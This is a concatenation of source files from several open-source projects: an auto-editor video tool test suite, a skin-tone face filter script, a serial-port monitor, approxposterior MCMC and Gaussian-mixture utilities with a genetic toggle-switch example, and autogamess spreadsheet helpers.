stdout, __ = process.communicate()
return stdout.decode('utf-8')
def _get(self, file, stream, the_type, track, of='compact=p=0:nk=1'):
return self.pipe(['-select_streams', '{}:{}'.format(the_type, track),
'-show_entries', 'stream={}'.format(stream), '-of', of, file]).strip()
def getResolution(self, file):
return self._get(file, 'height,width', 'v', 0, of='csv=s=x:p=0')
def getTimeBase(self, file):
return self.pipe(['-select_streams', 'v', '-show_entries',
'stream=avg_frame_rate', '-of', 'compact=p=0:nk=1', file]).strip()
def getFrameRate(self, file):
nums = clean_list(self.getTimeBase(file).split('/'), '\r\t\n')
return int(nums[0]) / int(nums[1])
def getAudioCodec(self, file, track=0):
return self._get(file, 'codec_name', 'a', track)
def getVideoCodec(self, file, track=0):
return self._get(file, 'codec_name', 'v', track)
def getSampleRate(self, file, track=0):
return self._get(file, 'sample_rate', 'a', track)
def AudioBitRate(self, file):
def bitrate_format(num):
magnitude = 0
while abs(num) >= 1000:
magnitude += 1
num /= 1000.0
num = int(round(num))
return '%d%s' % (num, ['', 'k', 'm', 'g', 't', 'p'][magnitude])
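        # e.g. bitrate_format(50000) -> '50k'; bitrate_format(960) -> '960'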
exact_bitrate = self._get(file, 'bit_rate', 'a', 0)
return bitrate_format(int(exact_bitrate))
def pipe_to_console(cmd):
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
return process.returncode, stdout.decode('utf-8'), stderr.decode('utf-8')
def cleanup(the_dir):
for item in os.listdir(the_dir):
item = os.path.join(the_dir, item)
if('_ALTERED' in item or item.endswith('.xml') or item.endswith('.json')
or item.endswith('.fcpxml') or item.endswith('.mlt')):
os.remove(item)
if(item.endswith('_tracks')):
shutil.rmtree(item)
def clean_all():
cleanup('resources')
cleanup(os.getcwd())
def getRunner():
if(platform.system() == 'Windows'):
return ['py', '-m', 'auto_editor']
return ['python3', '-m', 'auto_editor']
def run_program(cmd):
no_open = '.' in cmd[0]
cmd = getRunner() + cmd
if(no_open):
cmd += ['--no_open']
returncode, stdout, stderr = pipe_to_console(cmd)
if(returncode > 0):
raise Exception('Test Failed.\n{}\n{}\n'.format(stdout, stderr))
def checkForError(cmd, match=None):
returncode, stdout, stderr = pipe_to_console(getRunner() + cmd)
if(returncode > 0):
if('Error!' in stderr):
if(match is not None and match not in stderr):
                raise Exception('Test Failed.\nCouldn\'t find "{}"'.format(match))
else:
raise Exception('Test Failed.\nProgram crashed.\n{}\n{}'.format(stdout, stderr))
else:
        raise Exception('Test Failed.\nProgram should not have exited with code 0.')
def fullInspect(fileName, *args):
for item in args:
func = item[0]
expectedOutput = item[1]
if(func(fileName) != expectedOutput):
# Cheating on float numbers to allow 30 to equal 29.99944409236961
if(isinstance(expectedOutput, float)):
from math import ceil
if(ceil(func(fileName) * 100) == expectedOutput * 100):
continue
            raise Exception('Inspection Failed. Was {}, Expected {}.'.format(
                func(fileName), expectedOutput))
class Tester():
def __init__(self, args):
self.passed_tests = 0
self.failed_tests = 0
self.allowable_fails = 1
self.args = args
def run_test(self, name, func, description='', cleanup=None):
if(self.args.only != [] and name not in self.args.only):
return
try:
            print(name, end=" ", flush=True)
func()
except Exception as e:
self.failed_tests += 1
print('Failed.')
print(e)
clean_all()
if(self.failed_tests > self.allowable_fails):
sys.exit(1)
else:
self.passed_tests += 1
print('Passed.')
if(cleanup is not None):
cleanup()
def end(self):
print('{}/{}'.format(self.passed_tests, self.passed_tests + self.failed_tests))
clean_all()
if(self.failed_tests > self.allowable_fails):
sys.exit(1)
sys.exit(0)
def main(sys_args=None):
print("Testing auto-editor version",auto_editor_version)
parser = vanparse.ArgumentParser('test', 'version')
parser = test_options(parser)
if(sys_args is None):
        sys_args = sys.argv[1:]
# catch any exceptions thrown by the parser if it calls log.error()
try:
args = parser.parse_args(sys_args, Log(), 'test')
except RuntimeError:
exit(1)
ffprobe = FFprobe(args.ffprobe_location)
tester = Tester(args)
def help_tests():
run_program(['--help'])
run_program(['-h'])
run_program(['--frame_margin', '--help'])
run_program(['--frame_margin', '-h'])
run_program(['exportMediaOps', '--help'])
run_program(['exportMediaOps', '-h'])
run_program(['progressOps', '-h'])
run_program(['--help', '--help'])
run_program(['-h', '--help'])
run_program(['--help', '-h'])
run_program(['-h', '--help'])
tester.run_test('help_tests', help_tests, description='check the help option, '\
'its short, and help on options and groups.')
def version_debug():
run_program(['--version'])
run_program(['-v'])
run_program(['-V'])
run_program(['--debug'])
# sanity check for example.mp4/ffprobe
if(ffprobe.getFrameRate('example.mp4') != 30.0):
print('getFrameRate did not equal 30.0')
sys.exit(1)
tester.run_test('version_tests', version_debug)
def subtitle_tests():
from auto_editor.render.subtitle import SubtitleParser
test = SubtitleParser()
test.contents = [
[0, 10, "A"],
[10, 20, "B"],
[20, 30, "C"],
[30, 40, "D"],
[40, 50, "E"],
[50, 60, "F"],
]
speeds = [99999, 1]
chunks = [[0, 10, 1], [10, 20, 0], [20, 30, 1], [30, 40, 0], [40, 50, 1],
[50, 60, 0]]
test.edit(chunks, speeds)
if(test.contents != [[0, 10, "A"], [10, 20, "C"], [20, 30, "E"]]):
raise ValueError('Incorrect subtitle results.')
tester.run_test('subtitle_tests', subtitle_tests)
def info_tests():
run_program(['info', 'example.mp4'])
run_program(['info', 'resources/man_on_green_screen.mp4'])
run_program(['info', 'resources/multi-track.mov'])
run_program(['info', 'resources/newCommentary.mp3'])
run_program(['info', 'resources/test.mkv'])
tester.run_test('info_tests', info_tests)
def level_tests():
run_program(['levels', 'example.mp4'])
run_program(['levels', 'resources/newCommentary.mp3'])
    tester.run_test('level_tests', level_tests, cleanup=lambda: os.remove('data.txt'))
def example_tests():
run_program(['example.mp4'])
fullInspect(
'example_ALTERED.mp4',
[ffprobe.getFrameRate, 30.0],
[ffprobe.getResolution, '1280x720'],
[ffprobe.getSampleRate, '48000'],
)
run_program(['example.mp4', '--video_codec', 'uncompressed'])
fullInspect(
'example_ALTERED.mp4',
[ffprobe.getFrameRate, 30.0],
[ffprobe.getResolution, '1280x720'],
[ffprobe.getVideoCodec, 'mpeg4'],
[ffprobe.getSampleRate, '48000'],
)
tester.run_test('example_tests', example_tests)
# Issue #200
def url_test():
run_program(['https://github.com/WyattBlue/auto-editor/raw/master/example.mp4'])
tester.run_test('url_test', url_test)
# Issue #172
def bitrate_test():
run_program(['example.mp4', '--audio_bitrate', '50k'])
fullInspect(
'example_ALTERED.mp4',
[ffprobe.AudioBitRate, '50k'],
)
tester.run_test('bitrate_test', bitrate_test)
# Issue #184
def unit_tests():
run_program(['example.mp4', '--mark_as_loud', '20s,22sec', '25secs,26.5seconds'])
run_program(['example.mp4', '--sample_rate', '44100'])
run_program(['example.mp4', '--sample_rate', '44100 Hz'])
run_program(['example.mp4', '--sample_rate', '44.1 kHz'])
run_program(['example.mp4', '--silent_threshold', '4%'])
tester.run_test('unit_tests', unit_tests,
description='''
Make sure all units are working appropriately. That includes:
- Seconds units: s, sec, secs, second, seconds
- Frame units: f, frame, frames
- Sample units: Hz, kHz
- Percent: %
''')
def backwards_range_test():
run_program(['example.mp4', '--edit', 'none', '--cut_out', '-5secs,end'])
run_program(['example.mp4', '--edit', 'all', '--add_in', '-5secs,end'])
tester.run_test('backwards_range_test', backwards_range_test, description='''
Cut out the last 5 seconds of a media file by using negative number in the
range.
''')
def cut_out_test():
run_program(['example.mp4', '--edit', 'none', '--video_speed', '2',
'--silent_speed', '3', '--cut_out', '2secs,10secs'])
run_program(['example.mp4', '--edit', 'all', '--video_speed', '2',
'--add_in', '2secs,10secs'])
tester.run_test('cut_out_test', cut_out_test)
def gif_test():
run_program(['resources/man_on_green_screen.gif', '--edit', 'none'])
tester.run_test('gif_test', gif_test, description='''
    Feed auto-editor a gif file and make sure it can spit out a correctly formatted
gif. No editing is requested.
''',
cleanup=clean_all)
def render_tests():
run_program(['example.mp4', '--render', 'opencv'])
fullInspect(
'example_ALTERED.mp4',
[ffprobe.getFrameRate, 30.0],
[ffprobe.getResolution, '1280x720'],
[ffprobe.getSampleRate, '48000'],
)
tester.run_test('render_tests', render_tests)
def margin_tests():
run_program(['example.mp4', '-m', '3'])
run_program(['example.mp4', '--margin', '3'])
run_program(['example.mp4', '-m', '0.3sec'])
run_program(['example.mp4', '-m', '6f'])
run_program(['example.mp4', '-m', '5 frames'])
run_program(['example.mp4', '-m', '0.4 seconds'])
tester.run_test('margin_tests', margin_tests)
def extension_tests():
shutil.copy('example.mp4', 'example')
checkForError(['example', '--no_open'], 'must have an extension.')
os.remove('example')
run_program(['example.mp4', '-o', 'example.mkv'])
os.remove('example.mkv')
run_program(['resources/test.mkv', '-o', 'test.mp4'])
os.remove('test.mp4')
tester.run_test('extension_tests', extension_tests)
def progress_ops_test():
run_program(['example.mp4', 'progressOps', '--machine_readable_progress'])
run_program(['example.mp4', 'progressOps', '--no_progress'])
tester.run_test('progress_ops_test', progress_ops_test)
def silent_threshold():
run_program(['resources/newCommentary.mp3', '--silent_threshold', '0.1'])
tester.run_test('silent_threshold', silent_threshold)
def track_tests():
run_program(['resources/multi-track.mov', '--cut_by_all_tracks'])
run_program(['resources/multi-track.mov', '--keep_tracks_seperate'])
run_program(['example.mp4', '--cut_by_this_audio', 'resources/newCommentary.mp3'])
tester.run_test('track_tests', track_tests)
def json_tests():
run_program(['example.mp4', '--export_as_json'])
run_program(['example.json'])
tester.run_test('json_tests', json_tests)
def speed_tests():
run_program(['example.mp4', '-s', '2', '-mcut', '10'])
run_program(['example.mp4', '-v', '2', '-mclip', '4'])
run_program(['example.mp4', '--sounded_speed', '0.5'])
run_program(['example.mp4', '--silent_speed', '0.5'])
tester.run_test('speed_tests', speed_tests)
def scale_tests():
run_program(['example.mp4', '--scale', '1.5', '--render', 'av'])
fullInspect(
'example_ALTERED.mp4',
[ffprobe.getFrameRate, 30.0],
[ffprobe.getResolution, '1920x1080'],
[ffprobe.getSampleRate, '48000'],
)
run_program(['example.mp4', '--scale', '0.2', '--render', 'av'])
fullInspect(
'example_ALTERED.mp4',
[ffprobe.getFrameRate, 30.0],
[ffprobe.getResolution, '256x144'],
[ffprobe.getSampleRate, '48000'],
)
run_program(['example.mp4', '--scale', '1.5', '--render', 'opencv'])
fullInspect(
'example_ALTERED.mp4',
[ffprobe.getFrameRate, 30.0],
[ffprobe.getResolution, '1920x1080'],
[ffprobe.getSampleRate, '48000'],
)
run_program(['example.mp4', '--scale', '0.2', '--render', 'opencv'])
fullInspect(
'example_ALTERED.mp4',
[ffprobe.getFrameRate, 30.0],
[ffprobe.getResolution, '256x144'],
[ffprobe.getSampleRate, '48000'],
)
tester.run_test('scale_tests', scale_tests)
def various_errors_test():
checkForError(['example.mp4', '--zoom', '0,60,1.5', '--render', 'av'])
checkForError(['example.mp4', '--zoom', '0'])
checkForError(['example.mp4', '--zoom', '0,60'])
checkForError(['example.mp4', '--rectangle', '0,60,0,10,10,20', '--render', 'av'])
checkForError(['example.mp4', '--rectangle', '0,60'])
checkForError(['example.mp4', '--background', '000'])
tester.run_test('various_errors_test', various_errors_test)
def create_sub_test():
run_program(['create', 'test', '--width', '640', '--height', '360', '-o',
'testsrc.mp4'])
fullInspect(
'testsrc.mp4',
[ffprobe.getFrameRate, 30.0],
[ffprobe.getResolution, '640x360'],
)
tester.run_test('create_sub_test', create_sub_test)
def effect_tests():
run_program(['testsrc.mp4', '--mark_as_loud', 'start,end', '--zoom', '10,60,2'])
run_program(['example.mp4', '--mark_as_loud', 'start,end', '--rectangle',
'audio>0.05,audio<0.05,20,50,50,100', 'audio>0.1,audio<0.1,120,50,150,100'])
run_program(['testsrc.mp4', '--mark_as_loud', 'start,end', '--zoom',
'start,end,1,0.5,centerX,centerY,linear', '--scale', '0.5'])
fullInspect(
'testsrc_ALTERED.mp4',
[ffprobe.getFrameRate, 30.0],
[ffprobe.getResolution, '320x180'],
)
run_program(['testsrc.mp4', '--mark_as_loud', 'start,end', '--rectangle',
'0,30,0,200,100,300,#43FA56,10'])
os.remove('testsrc_ALTERED.mp4')
os.remove('testsrc.mp4')
tester.run_test('effect_tests', effect_tests,
description='test the zoom and rectangle options',
cleanup=clean_all)
def export_tests():
for item in os.listdir('resources'):
if('man_on_green_screen' in item or item.startswith('.')):
continue
item = 'resources/{}'.format(item)
run_program([item])
run_program([item, '-exp'])
run_program([item, '-exr'])
run_program([item, '-exf'])
run_program([item, '-exs'])
run_program([item, '--export_as_clip_sequence'])
run_program([item, '--preview'])
cleanup('resources')
tester.run_test('export_tests', export_tests)
def codec_tests():
run_program(['example.mp4', '--video_codec', 'h264', '--preset', 'faster'])
run_program(['example.mp4', '--audio_codec', 'ac3'])
run_program(['resources/newCommentary.mp3', 'exportMediaOps', '-acodec', 'pcm_s16le'])
tester.run_test('codec_tests', codec_tests)
def combine_tests():
run_program(['example.mp4', '--mark_as_silent', '0,171', '-o', 'hmm.mp4'])
run_program(['example.mp4', 'hmm.mp4', '--combine_files', '--debug'])
os.remove('hmm.mp4')
tester.run_test('combine_tests', combine_tests)
def motion_tests():
run_program(['resources/man_on_green_screen.mp4', '--edit_based_on', 'motion',
'--debug', '--frame_margin', '0', '-mcut', '0', '-mclip', '0'])
run_program(['resources/man_on_green_screen.mp4', '--edit_based_on', 'motion',
'--motion_threshold', '0'])
tester.run_test('motion_tests', motion_tests)
def multi_processing_tests():
        run_program(['example.mp4', '--enable_multiprocessing'])
fullInspect(
'example_ALTERED.mp4',
[ffprobe.getFrameRate, 30.0],
[ffprobe.getResolution, '1280x720'],
[ffprobe.getSampleRate, '48000'],
)
run_program(['example.mp4', '--video_codec', 'uncompressed', '--enable_multiprocessing'])
fullInspect(
'example_ALTERED.mp4',
[ffprobe.getFrameRate, 30.0],
[ffprobe.getResolution, '1280x720'],
[ffprobe.getVideoCodec, 'mpeg4'],
[ffprobe.getSampleRate, '48000'],
)
    tester.run_test('multi_processing_tests', multi_processing_tests)
tester.end()
if(__name__ == '__main__'):
main()
```
|
{
"source": "jedbrooke/FPGA-face-detection",
"score": 3
}
|
#### File: FPGA-face-detection/tests/face_filter.py
```python
import numpy as np
from PIL import Image
import sys
from centroid import centroid_from_numpy
IMG_SIZE = 256
WINDOW_SIZE = 9
SMOOTH_THRESH = 0.7
def isSkin(u,v):
    return 26 < u < 74
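# Worked example (illustrative): a skin-toned pixel (r, g, b) = (180, 120, 110)
# gives u = 60, inside the accepted (26, 74) band, while a green pixel
# (40, 200, 60) gives u = -160 and is rejected. Note that only u is tested.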
def smoothWindow(window):
    return np.sum(window) > ((WINDOW_SIZE ** 2) * SMOOTH_THRESH)
def main(img_path):
img = np.genfromtxt(img_path,delimiter=",",dtype=np.uint8).reshape((IMG_SIZE,IMG_SIZE,3))
r = img[:,:,0].astype(np.int16)
g = img[:,:,1].astype(np.int16)
b = img[:,:,2].astype(np.int16)
u = r - g
v = b - g
mask = np.array([[isSkin(u[y,x],v[y,x]) for x in range(IMG_SIZE)] for y in range(IMG_SIZE)])
mask = np.array([[smoothWindow(mask[y-(WINDOW_SIZE // 2):y+(WINDOW_SIZE//2)+1,x-(WINDOW_SIZE // 2):x+(WINDOW_SIZE//2)+1]) for x in range(IMG_SIZE - (2*WINDOW_SIZE))] for y in range(IMG_SIZE - (2*WINDOW_SIZE))])
h,w = mask.shape
centroids = centroid_from_numpy(mask.reshape((h,w,1)))
    if isinstance(centroids, tuple):
        centroids = [centroids]
for centroid_x,centroid_y in centroids:
print(centroid_x,centroid_y)
mask = mask.astype(np.uint8) * 255
mask_rgb = np.dstack((mask,mask,mask))
for centroid_x,centroid_y in centroids:
mask_rgb[centroid_y-(WINDOW_SIZE//4):centroid_y+(WINDOW_SIZE//4)+1,centroid_x-(WINDOW_SIZE//4):centroid_x+(WINDOW_SIZE//4)+1] = [255,0,0]
Image.fromarray(mask_rgb).save("test.png",mode="RGB")
if __name__ == '__main__':
main(sys.argv[1])
```
|
{
"source": "jedbrooke/la-hacks-2021",
"score": 3
}
|
#### File: jedbrooke/la-hacks-2021/SerialMonitor.py
```python
from ece121 import Protocol
import time
import datetime
def MonitorPrint(inBytes):
Message = inBytes[1:]
ID = inBytes[0]
try:
IDString = Protocol.MessageIDs(ID).name
except ValueError:
IDString = "Invalid ID ({})".format(ID)
# print(IDString)
try:
Message = Message.decode('ascii')
except UnicodeError:
pass
print("{}\t{}\t{}".format(datetime.datetime.now(), IDString, Message))
return
def DisconnectHandler(inException):
print(inException)
while True:
time.sleep(.1)
if prot.Connect():
print("Connected to {}".format(prot.Port))
break
return
print("Current Serial Ports", Protocol.Protocol.listSerialPorts())
prot = Protocol.Protocol()
for enum in Protocol.MessageIDs:
prot.registerMessageHandler(enum, MonitorPrint)
# prot.registerHandler(Protocol.MessageIDs.ID_DEBUG, MonitorPrint)
prot.registerErrorHandler(DisconnectHandler)
if not prot.activeConnection:
print("No Serial Port Found")
while True:
time.sleep(.1)
if prot.Connect():
print("Connected to {}".format(prot.Port))
break
while True:
time.sleep(1)
```
|
{
"source": "jedbrown/approxposterior",
"score": 3
}
|
#### File: approxposterior/approxposterior/gmm_utils.py
```python
from __future__ import (print_function, division, absolute_import,
unicode_literals)
# Tell module what it's allowed to import
__all__ = ["fit_gmm"]
import numpy as np
from sklearn.model_selection import GridSearchCV
from sklearn.mixture import GaussianMixture
def fit_gmm(sampler, iburn, max_comp=6, cov_type="full", use_bic=True):
"""
Fit a Gaussian Mixture Model to the posterior samples to derive an
approximation of the posterior density. Fit for the number of components
    by either minimizing the Bayesian Information Criterion (BIC) or via
cross-validation.
Parameters
----------
sampler : emcee.EnsembleSampler
sampler object containing the MCMC chains
iburn : int
number of burn-in steps to discard for fitting
max_comp : int (optional)
Maximum number of mixture model components to fit for. Defaults to 6.
cov_type : str (optional)
GMM covariance type. Defaults to "full". See the documentation here:
http://scikit-learn.org/stable/modules/generated/sklearn.mixture.GaussianMixture.html
for more info
use_bic : bool (optional)
Minimize the BIC to pick the number of GMM components or use cross
validation? Defaults to True (aka, use the BIC)
Returns
-------
GMM : sklearn.mixture.GaussianMixture
fitted Gaussian mixture model
"""
# Select optimal number of components via minimizing BIC
if use_bic:
bic = []
lowest_bic = 1.0e10
        best_n = 1
        gmm = GaussianMixture()
        for n_components in range(1, max_comp+1):
            gmm.set_params(**{"n_components" : n_components,
                              "covariance_type" : cov_type})
            gmm.fit(sampler.flatchain[iburn:])
            bic.append(gmm.bic(sampler.flatchain[iburn:]))
            if bic[-1] < lowest_bic:
                lowest_bic = bic[-1]
                best_n = n_components
        # Refit a fresh GMM with the BIC-minimizing number of components
        # (gmm is mutated each iteration, so the loop object cannot serve as
        # the best fit)
        GMM = GaussianMixture(n_components=best_n, covariance_type=cov_type)
        GMM.fit(sampler.flatchain[iburn:])
# Select optimal number of components via 5 fold cross-validation
else:
        hyperparams = {"n_components" : np.arange(1, max_comp + 1)}
gmm = GridSearchCV(GaussianMixture(covariance_type=cov_type),
hyperparams, cv=5)
gmm.fit(sampler.flatchain[iburn:])
GMM = gmm.best_estimator_
GMM.fit(sampler.flatchain[iburn:])
return GMM
# end function
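
# Hypothetical usage sketch (the sampler/iburn/theta names are assumptions, not
# part of this module): after an emcee run,
#   gmm = fit_gmm(sampler, iburn=500, max_comp=4)
#   logp = gmm.score_samples(theta.reshape(1, -1))
# score_samples returns the log of the fitted mixture density, i.e. the
# posterior approximation used downstream.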
```
#### File: approxposterior/approxposterior/mcmc_utils.py
```python
from __future__ import (print_function, division, absolute_import,
unicode_literals)
# Tell module what it's allowed to import
__all__ = ["autocorr","estimate_burnin"]
import numpy as np
import emcee
from scipy.interpolate import UnivariateSpline
def autocorr(x):
"""
Compute the autocorrelation function
http://stackoverflow.com/q/14297012/190597
http://en.wikipedia.org/wiki/Autocorrelation#Estimation
Parameters
----------
x : array
Returns
-------
result : array
ACF
"""
n = len(x)
variance = x.var()
x = x-x.mean()
r = np.correlate(x, x, mode = 'full')[-n:]
result = r/(variance*(np.arange(n, 0, -1)))
return result
# end function
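# Sanity check for autocorr (illustrative): the ACF is exactly 1 at lag 0 by
# construction, and for white noise it decays to ~0 immediately:
#   >>> acf = autocorr(np.random.randn(10000))
#   >>> np.isclose(acf[0], 1.0)
#   True
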
def estimate_burnin(sampler, nwalk, nsteps, ndim):
"""
Given an MCMC chain, estimate the burn-in time (credit: <NAME>)
This function computes the maximum autocorrelation length of all the walkers
that clearly haven't strayed too far from the converged answer. If your
chains have converged, this function provides a conservative estimate of the
burn-in. As with all things, MCMC, your mileage will vary. Currently this
function just supports emcee.
Parameters
----------
sampler : emcee.EnsembleSampler
nwalk : int
Number of walkers
nsteps : int
Number of MCMC steps (iterations)
ndim : int
Data dimensionality (number of parameters)
Returns
-------
iburn : int
Index corresponding to estimated burn-in length scale
"""
iburn = 0
ikeep = []
autoc = []
autolength = []
walkers = np.arange(nwalk)
iterations = np.arange(nsteps)
# Loop over number of free parameters
for j in range(ndim):
# Loop over walkers
for i in range(nwalk):
            # Get list of other walker indices
walkers = np.arange(nwalk)
other_iwalkers = np.delete(walkers, i)
# Calculate the median of this chain
med_chain = np.median(sampler.chain[i,iburn:,j])
# Calculate the mean of this chain
mean_chain = np.mean(sampler.chain[i,iburn:,j])
# Calculate the median and std of all the other chains
med_other = np.median(sampler.chain[other_iwalkers,iburn:,j])
std_other = np.std(sampler.chain[other_iwalkers,iburn:,j])
# If this chain is within 3-sig from all other chain's median
if np.fabs(mean_chain - med_other) < 3*std_other:
# Keep it!
ikeep.append(i)
# Get autocorrelation of chain
autoci = autocorr(sampler.chain[i,iburn:,j])
autoc.append(autoci)
# Fit with spline
spline = UnivariateSpline(iterations, autoci, s=0)
# Find zero crossings
roots = spline.roots()
# Save autocorrelation length
autolength.append(np.min(roots))
# List of chains that we are keeping
ikeep = list(set(ikeep))
# Set burn-in index to maximum autocorrelation length
return int(np.max(autolength))
# end function
```
#### File: approxposterior/examples/genetic.py
```python
import numpy as np
from scipy.integrate import odeint
import emcee
import corner
from approxposterior import mcmc_utils
from approxposterior.pool import Pool
import matplotlib as mpl
import matplotlib.pyplot as plt
mpl.rcParams.update({'font.size': 18})
def genetic_model(y, t, alpha1, alpha2, gamma, beta, eta, IPTG, K):
# u = y[0], v = y[1]
u, v = y
w = u/(1.0 + np.power(IPTG/K,eta))
return [alpha1/(1.0 + np.power(v,beta)) - u, alpha2/(1.0 + np.power(w,gamma)) - v]
# end function
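# The toggle-switch ODEs implemented in genetic_model, written out:
#   du/dt = alpha1 / (1 + v**beta)  - u
#   dv/dt = alpha2 / (1 + w**gamma) - v,   where w = u / (1 + (IPTG/K)**eta)
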
def genetic_lnprior(x):
"""
Uniform log prior for the genetic switch likelihood following Wang & Li (2017)
where the prior pi(x) is a uniform distribution for each parameter.
Parameters
----------
x : array
Returns
-------
l : float
log prior
"""
x = np.array(x)
if x.ndim > 1:
alpha1 = x[:,0]
alpha2 = x[:,1]
gamma = x[:,2]
beta = x[:,3]
eta = x[:,4]
K = x[:,5]
else:
alpha1, alpha2, gamma, beta, eta, K = x
# All flat priors from Wang & Li (2017)
if np.any(alpha1 < 120.0) or np.any(alpha1 > 200.0):
return -np.inf
elif np.any(alpha2 < 15.0) or np.any(alpha2 > 16.0):
return -np.inf
elif np.any(gamma < 2.1) or np.any(gamma > 2.9):
return -np.inf
elif np.any(beta < 0.85) or np.any(beta > 1.15):
return -np.inf
elif np.any(eta < 1.3) or np.any(eta > 2.7):
return -np.inf
elif np.any(K < np.log10(2.3e-5)) or np.any(K > np.log10(3.7e-5)):
return -np.inf
else:
return 0.0
# end function
def genetic_sample(n):
"""
    Sample n points from the prior pi(x), a uniform distribution over the
    ranges given in Wang & Li (2017) for the genetic toggle example.
Parameters
----------
n : int
Number of samples
Returns
-------
sample : floats
n x 6 array of floats samples from the prior
"""
alpha1 = np.random.uniform(low=120.0, high=200.0, size=(n,1))
alpha2 = np.random.uniform(low=15.0, high=16.0, size=(n,1))
gamma = np.random.uniform(low=2.1, high=2.9, size=(n,1))
beta = np.random.uniform(low=0.85, high=1.15, size=(n,1))
eta = np.random.uniform(low=1.3, high=2.7, size=(n,1))
K = np.random.uniform(low=np.log10(2.3e-5), high=np.log10(3.7e-5), size=(n,1)) # Log prior
return np.hstack([alpha1, alpha2, gamma, beta, eta, K]).squeeze()
# end function
def genetic_lnlike(x):
"""
Log-likelihood for the genetic switch likelihood following Wang & Li (2017).
Valid for the following "true" forward model parameters:
alpha1 = 143.0
alpha2 = 15.95
gamma = 2.70
beta = 0.96
eta = 2.34
K = 2.7e-5
IPTG = 1.0e-6
observable: 3.1826343015096331e-05 (v concentration at t=10)
noise level: 0.022360679774997897 (sqrt(5.0e-4))
Parameters
----------
x : array
Returns
-------
l : float
lnlike
"""
# True value, error, true value + error (error sampled from N(0,err^2))
obs = np.array([-0.0328982971670082,
15.984925746386871,
15.900771796186838,
15.96194037051973,
15.970237000713183,
15.945775511242514])
err = 0.0224
IPTG_arr = [1.0e-6, 5.0e-4, 7.0e-4, 1.0e-3, 3.0e-3, 5.0e-3]
model = list() # Holds forward model outputs
# Unpack data
x = np.array(x)
if x.ndim > 1:
alpha1 = x[:,0]
alpha2 = x[:,1]
gamma = x[:,2]
beta = x[:,3]
eta = x[:,4]
K = x[:,5]
else:
alpha1, alpha2, gamma, beta, eta, K = x
# Run forward model to get prediction (final value of v)
t = np.linspace(0.0, 10.0, 100)
y0 = [1.0e-2, 1.0e-2] # results not sensitive to initial conditions
for IPTG in IPTG_arr:
sol = odeint(genetic_model, y0, t, args=(alpha1, alpha2, gamma, beta, eta, IPTG, 10**K),
full_output=False)
model.append(float(sol[-1,1]))
return -0.5*np.sum((obs - np.array(model))**2 / err**2)
# end function
def lnprob(x):
lp = genetic_lnprior(x)
if not np.isfinite(lp):
return -np.inf
return lp + genetic_lnlike(x)
ndim = 6 # Number of dimensions
nsteps = 100 # Number of MCMC iterations
verbose = True # Don't output lots of stuff
nwalk = 10 * ndim # Use 10 walkers per dimension
# Initial guess for walkers (random over prior)
p0 = [genetic_sample(1) for j in range(nwalk)]
sampler = emcee.EnsembleSampler(nwalk, ndim, lnprob, pool=Pool())
for i, result in enumerate(sampler.sample(p0, iterations=nsteps)):
if verbose:
print("%d/%d" % (i+1, nsteps))
print("emcee finished!")
iburn = mcmc_utils.estimate_burnin(sampler, nwalk, nsteps, ndim)
print(iburn)
fig = corner.corner(sampler.flatchain[iburn:],
quantiles=[0.16, 0.5, 0.84],
plot_contours=True, show_titles=True);
plt.show()
```
|
{
"source": "jedbrown/autogamess",
"score": 3
}
|
#### File: autogamess/autogamess/generate_scaling_factors.py
```python
from .config import *
from openpyxl import load_workbook
def generate_scaling_factors(projdir, expt_dict, species):
"""
This function generates scaling factors and scaled frequencies.
Parameters
----------
projdir: string
This should be a full directory string pointing to the project
        directory initially created by new_project.
expt_dict: dictionary
This should be a python dictionary with the experimental frequency
values for all species that the user wants to generate scaling factors
for in it. Format is explained in Notes section.
species: list
This should be a list of all species the user would like scaling factors
generated for. Any molecule in the list must have experimental data in
the `expt_dict` associated with it.
Notes
-------
`expt_dict` format should be as follows:
{`specie`: [`nu_1`, `nu_2`, ... , `nu_N`]}
where `specie` must be written the same way as the Excel spreadsheet file
for that molecule is written. Each frequency, `nu`, should be given in
the same order as they appear (left to right) in the spreadsheet.
`species` list format can be in any order but must adhere to the rule
that any element in `species` is a key for `expt_dict`
Once execution of this function is completed the `Hessian` worksheet
will be updated to have a coulmn giving `Scaling Factor/RMS`, as well
as the scaled frequencies will appear in parathesis next to the predicted
frequencies.
Returns
-------
This function returns nothing.
Example
-------
>>> import autogamess as ag
>>>
>>> projdir = './Your Project Title/'
>>> expt_dict = {'H2O': [1595, 3657, 3756]}
>>> species = ['H2O']
>>>
>>> ag.generate_scaling_factors(projdir, expt_dict, species)
>>>
"""
#string variables
sheetsdir = projdir + 'Spreadsheets/'
xlsx = '.xlsx'
hes = 'Hessian'
for specie in species:
if os.path.isfile(sheetsdir + specie + xlsx):
df = pd.read_excel(sheetsdir + specie + xlsx, index_col=0,
sheet_name=hes, header=6)
df2 = pd.read_excel(sheetsdir + specie + xlsx, index_col=0,
sheet_name=hes, header=6)
#get only frequency columns
x = [col for col in df.columns if 'Vibrational' not in col]
df.drop(x, axis=1, inplace=True)
df.dropna(inplace=True)
#get expt data from dictionary
expt = expt_dict[specie]
df2['Scaling Factor/RMS'] = np.nan
#iterate through DataFrame
for i,j in df.iterrows():
theo = list(j.values)
#get scaling factors
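                # scaling_factor_scott comes from .config; presumably it returns
                # the least-squares factor c = sum(theo*expt)/sum(theo**2) and
                # the corresponding RMS error (an assumption, not verified here)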
c, rms = scaling_factor_scott(theo, expt)
#apply to columns in sliced DataFrame
df.loc[i] = j.apply(lambda x: str(x) + '(' + str(round(float(x)*c, 2)) + ')')
#Added column giving Scaling Factor and RMS
df2.loc[i,'Scaling Factor/RMS'] = str(c) + '/' + str(rms)
#update main DataFrame
df2.update(df)
#write Excel spreadsheet with updated DataFrame
book = load_workbook(sheetsdir + specie + xlsx)
with pd.ExcelWriter(sheetsdir + specie + xlsx, engine='openpyxl') as writer:
writer.book = book
writer.sheets = dict((ws.title, ws) for ws in book.worksheets)
df2.to_excel(writer, sheet_name=hes, startrow=6)
return
```
#### File: autogamess/autogamess/new_project.py
```python
import pkg_resources
from .config import *
from .input_builder import input_builder
def new_project(maindir, csvfile, initial_coords_dict=None,
title='Project_Name/', make_inputs=False):
"""
This function creates a new directory tree for a GAMESS project, also makes
a couple of text files for use with other functions.
Parameters
----------
maindir: string
A directory string (including the final `/`) that points to the
directory that the project tree will be spawned in.
csvfile: string
A directory string (including the final `.csv`) that points to the
text file containing project information. Read module documentation
for csv file format.
initial_coords_dict: dictionary [Optional]
This should be a dictionary with the key being the specie and the
value being a list that of its inital coordinates.
title: string [Optional]
